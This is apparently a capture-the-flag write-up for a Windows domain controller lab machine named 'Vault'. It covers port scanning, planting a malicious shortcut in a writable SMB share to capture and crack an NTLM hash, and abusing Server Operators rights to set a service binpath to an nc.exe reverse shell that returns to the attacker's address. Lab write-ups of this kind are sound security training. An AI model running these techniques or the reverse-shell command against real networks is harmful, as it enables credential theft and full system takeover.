Vault
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 4000 -Pn 192.168.240.172
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-07 15:05 +08
Nmap scan report for 192.168.240.172
Host is up (0.18s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49689/tcp open unknown
49704/tcp open unknown
Loads of ports.
Guest Shares
There were some shares that smbmap
picked up on with guest
credentials:
$ smbmap -u guest -p '' -H 192.168.240.172
[+] IP: 192.168.240.172:445 Name: 192.168.240.172
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DocumentsShare READ, WRITE
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
Within the DocumentsShare share, there was nothing within it:
$ smbclient -U guest //192.168.240.172/DocumentsShare
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jul 7 15:06:47 2023
.. D 0 Fri Jul 7 15:06:47 2023
7706623 blocks of size 4096. 656179 blocks available
There was nothing else about this machine. This reminded me of a few HTB machines where we had to place a malicious file that would trigger a user to click on, which would send requests to our attacker machine and allow us to capture NTLM hashes on responder
.
There a few methods of creating such files, but I used this repository:
$ python3 lnkbomb.py -t \\192.168.240.172\DocumentsShare -a 192.168.45.216
ββ βββ ββ ββ ββ ββββββ ββββββ βββ βββ ββββββ
ββ ββββ ββ ββ ββ ββ ββ ββ ββ ββββ ββββ ββ ββ
ββ ββ ββ ββ βββββ ββββββ ββ ββ ββ ββββ ββ ββββββ
ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ
βββββββ ββ ββββ ββ ββ ββββββ ββββββ ββ ββ ββββββ
Malicious Shortcut Generator
A project by The Mayor
Malicious shortcut named fuxiylyrbv.url created in the \192.168.240.172DocumentsShare file share.
Recovery file fuxiylyrbv.recovery created in your current directory.
Run python3 lnkbomb.py -r fuxiylyrbv.recovery to remove the file from the target share.
$ mv '\192.168.240.172DocumentsShare\fuxiylyrbv.url' test.url
Afterwards, we can place this file within the share and start a responder
instance, which would immediately capture a hash:

This can be cracked almost instantly:
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
SecureHM (anirudh)
1g 0:00:00:03 DONE (2023-07-07 15:13) 0.2857g/s 3031Kp/s 3031Kc/s 3031KC/s Seifer@14..Schsutar90
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Then, we can evil-winrm
in:

Privilege Escalation
Server Operators -> DA
Our current user was part of the Server Operators group:
*Evil-WinRM* PS C:\Users\anirudh\Documents> net user anirudh
User name anirudh
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 11/19/2021 1:59:51 AM
Password expires Never
Password changeable 11/20/2021 1:59:51 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/17/2023 2:43:54 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use *Server Operators
Global Group memberships *Domain Users
The command completed successfully.
Since we are part of this group, we can do loads of things like manipulate services and what not.
*Evil-WinRM* PS C:\Users\anirudh\Documents> services
Path Privileges Service
---- ---------- -------
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe True ADWS
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe True PerfHost
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" False Sense
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe" True VGAuthService
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" True VMTools
"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe" True WdNisSvc
"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe" True WinDefend
"C:\Program Files\Windows Media Player\wmpnetwk.exe" False WMPNetworkSvc
We can abuse the VMTools service.
sc.exe config VMTools binpath="C:\Windows\Tasks\nc.exe -e cmd.exe 192.168.45.216 21"
sc.exe stop VMTools
sc.exe start VMTools
A SYSTEM shell would spawn on a listener port:

Rooted!
Last updated